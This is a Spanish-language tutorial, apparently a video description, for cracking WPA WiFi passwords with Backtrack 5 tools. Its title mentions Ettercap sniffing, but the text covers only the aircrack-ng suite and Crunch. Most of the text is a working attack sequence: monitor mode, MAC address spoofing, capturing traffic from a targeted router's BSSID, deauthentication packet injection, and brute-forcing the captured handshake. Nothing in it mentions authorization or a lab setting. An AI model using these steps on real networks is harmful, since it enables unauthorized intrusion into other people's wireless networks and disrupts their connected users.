Backtrack 5 - Olfateando Passwords con Ettercap por Intruder-T23 HD

Decodificando Passwords de Wifi (Olfateo y Fuerza Bruta) por Intruder-T23 Introducción: Este video es muy similar al anterior que trata sobre como crackear passwords de Wifi. Ambos comienzan de la misma forma (se introducen los mismos comandos en la terminal), pero el final es diferente ya que el anterior es un ataque de diccionario, y este es un ataque de fuerza bruta... Por lo que se termina usando una herramienta llamada Crunch que va junto con el Aircrack. Herramientas en el video: 1. Airmon-ng: Este programa se usa para poner la tarjeta wireless en modo monitor, de forma que uno puede capturar valores. 2. airodump-ng: Es un sniffer (olfateador) que captura el tráfico y lo coloca en archivos PCAP/IVS. 3. aireplay-ng: Este software se usa para inyectar paquetes, y funciona para generar aquel tráfico que será usado en aircrack-ng. 4. aircrack-ng: Es una aplicación que se usa para decodificar passwords WEP y WPA. 5. Crunch: Esta herramienta se puede utilizar con Aircrack-ng para decodificar passwords de Wifi mediante un ataque de fuerza bruta. Teclas en la terminal - Parte 1: Código: A. airmon-ng B. airmon-ng start wlan0 C. airmon-ng D. ifconfig mon0 down E. macchanger -m 00:11:22:33:44:55 mon0 F. ifconfig mon0 up G. airodump-ng mon0 Descripción de comandos: A. Se teclea airmon-ng para ver la interface, la cual es wlan0. B. Se teclea airmon-ng start wlan0 para colocar la interface wlan0 en modo monitor. C. Tecleamos nuevamente airmon-ng y en la categoría de interface veremos mon0. D. Ponemos mon0 down por unos instantes. E. Cambiamos la dirección mac. F. Ponemos mon0 up. G. Usamos airodump-ng para ver los routers que hay en nuestra zona y capturar el tráfico. Teclas en la terminal - Parte 2: Código: H. airodump-ng -c 6 -w WPACRACK333 --bssid 00:14:BF:E8:22:FB --ivs mon0 I. aireplay-ng -0 1 -e NET mon0 J. cd /pentest/passwords/crunch K. ./crunch 8 8 | aircrack-ng /root/WPACRACK333-01.ivs -e NET -w - Descripción de comandos: H. Se teclea "-c 6" para especificar el número del canal del router que le queremos sacar el password (en el paso G, este aparece debajo "CH")... Se teclea "-w WPACRACK333" para crear el archivo que contendrá la clave encriptada... Se teclea "--bssid 00:14:BF:E8:22:FB" para especificar el BSSID del router (en el paso G, este aparece debajo de BSSID). I. Se usa Aireplay-ng para inyectar paquetes y generar el tráfico que será usado en aircrack-ng. Notece que se tecleo "-e NET" ya que "NET" es el nombre del router (en el paso G, este aparece debajo de ESSID). J. Se usa cd para ir al directorio del programa crunch. K. Se usa el programa "Crunch" junto con "Aircrack-ng" para decodificar el password. Los digitos 8 8 significa que va a comenzar a utilizar un ataque de fuerza bruta comenzando por 8 letras (hay miles de formas de utilizar el crunch, puede ser comenzando desde 9 dígitos/letras, una fuerza bruta con las teclas o números que uno quiera, o también se puede usar para que comience desde la frase que uno quiera.